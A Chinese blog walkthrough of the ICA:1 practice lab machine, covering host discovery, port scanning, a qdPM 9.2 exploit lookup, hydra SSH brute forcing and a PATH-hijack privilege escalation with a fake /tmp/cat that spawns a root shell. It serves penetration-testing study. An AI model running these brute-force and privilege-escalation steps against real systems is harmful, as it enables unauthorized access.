首页 > 其他分享 >ICA:1靶场

ICA:1靶场

时间:2023-04-13 21:44:16浏览次数:36  
标签:tmp 142.129 ICA 192.168 cat 提权 靶场 txt

ICA:1靶场

目录

机器信息:

靶机:192.168.142.129

攻击机:192.168.142.132

一、主机发现

arp-scan -l

或者

nmap -sP 192.168.142.0/24

二、端口扫描

nmap -sV -p- 192.168.142.129

或者

nmap -A -p- 192.168.142.129

三、渗透提权阶段

(1)查询框架漏洞:

searchsploit qdpm 9.2

(2)找到对应文件:

locate php/webapps/50176.txt

或者

find / -name 50176.txt

(3)通过50176.txt中的方法找到了数据库用户名和密码

(4)登录数据库查询用户信息

(5)用数据库拿到的信息进行ssh爆破

hydra -L user.txt -P password.txt ssh://192.168.142.129

(6)确定用户账号和密码,ssh进行登录

(7)得到提示,找查可执行文件

find / -perm -u=s 2>/dev/null

(8)通过strings查看文件中的字符

strings /opt/get_access

(9)发现存在setuid、system、cat /root/system.info等字眼

(10)修改环境变量来提权

vim /tmp/cat

echo "/bin/bash" > /tmp/cat

chmod +x /tmp/cat

export PATH=/tmp:$PATH

echo $PATH

(11)执行文件,成功提权

/opt/get_access

(12)提权后删除/tmp/cat文件

(13)到/root目录下拿到flag

参考资料:

https://www.cnblogs.com/sainet/p/15656589.html

https://juejin.cn/post/7067099039526813703

标签:tmp,142.129,ICA,192.168,cat,提权,靶场,txt
From: https://www.cnblogs.com/candada/p/17316533.html

相关文章

  • light oj 1007 Mathematically Hard (欧拉函数)
    题目地址:lightoj1007第一发欧拉函数。欧拉函数重要性质:设a为N的质因数,若(N%a==0&&(N/a)%a==0)则有E(N)=E(N/a)*a;若(N%a==0&&(N/a)%a!=0)则有:E(N)=E(N/a)*(a-1)对于这题来说,首先卡MLE。。只能开一个数组。。所以把前缀和也存到......
  • 论文解读( FGSM)《Adversarial training methods for semi-supervised text classificat
    论文信息论文标题:Adversarialtrainingmethodsforsemi-supervisedtextclassification论文作者:TaekyungKim论文来源:ICLR2017论文地址:download 论文代码:download视屏讲解:click1 背景1.1 对抗性实例(Adversarialexamples)通过对输入进行小扰动创建的实例,可显著增加机器......
  • 用Abp实现两步验证(Two-Factor Authentication,2FA)登录(三):免登录验证
    @目录原理修改请求报文配置JwtBearerOptions生成Token校验Token修改认证EndPoint修改前端登录登出最终效果项目地址免登录验证是用户在首次两步验证通过后,在常用的设备(浏览器)中,在一定时间内不需要再次输入验证码直接登录。常见的网页上提示“7天免登录验证”或“信任此设备,7天内......
  • 通过UIApplicationMain实现应用内多种事件拦截
    简介UIApplicationMain大家并不陌生,因为在通过XCode建立iOS的Ojective-C工程时肯定会看到。新建的main.m文件长这样:intmain(intargc,char*argv[]){NSString*appDelegateClassName;@autoreleasepool{appDelegateClassName=NSStringFromClas......
  • 用Abp实现两步验证(Two-Factor Authentication,2FA)登录(二):Vue网页端开发
    @目录发送验证码登录退出登录界面控件获取用户信息功能项目地址前端代码的框架采用vue.js+elementUI这套较为简单的方式实现,以及typescript语法更方便阅读。首先添加全局对象:loginForm:登录表单对象twoFactorData:两步验证数据,showTwoFactorSuccess:是否显示两步验证成......
  • UVa 757 / POJ 1042 / East Central North America 1999 Gone Fishing (枚举&贪心&想
    757-GoneFishingTimelimit:3.000secondshttp://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=698http://poj.org/problem?id=1042Johnisgoingonafishingtrip.Hehas h hoursavailable( ),andther......
  • 【论文阅读笔记】iCaRL: Incremental Classifier and Representation Learning
    Author:AlexanderKolesnikovKey_words:nearest-mean-of-exemplarrule,prioritizedexamplerselection,representationlearningCreate_time:September11,20213:06PMEdited_by:HuangYujunPublisher:CVPR2017Score/5:⭐️⭐️Status:FinishediCaRL:Incre......
  • Lampiao靶场-dirtycow漏洞利用
    Lampiao靶场-dirtycow漏洞利用目录Lampiao靶场-dirtycow漏洞利用一、主机发现二、端口扫描三、目录遍历四、拿到webshell五、实现交互式shell六、暴力破解七、把dirtycow脚本传到靶机八、编译运行dirtycow脚本只是简单记录一下所用工具靶机信息:靶机:192.168.142.132攻击机:192.......
  • delphi入门-控制台console application
    1programProject1;2usesWindows;3begin4MessageBox(0,PChar('Ok!'),PChar('Title'),0);5end.programProject1;{$APPTYPECONSOLE}varstr:string;beginWriteln('请输入:');Readln(str);Writeln('你输入的是:&#......
  • 迁移学习《Cluster-Guided Semi-Supervised Domain Adaptation for Imbalanced Medica
    论文信息论文标题:Cluster-GuidedSemi-SupervisedDomainAdaptationforImbalancedMedicalImageClassification论文作者:S.Harada,RyomaBise,KengoAraki论文来源:ArXiv2March2023论文地址:download 论文代码:download视屏讲解:click1摘要一种半监督域自适应方法,......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99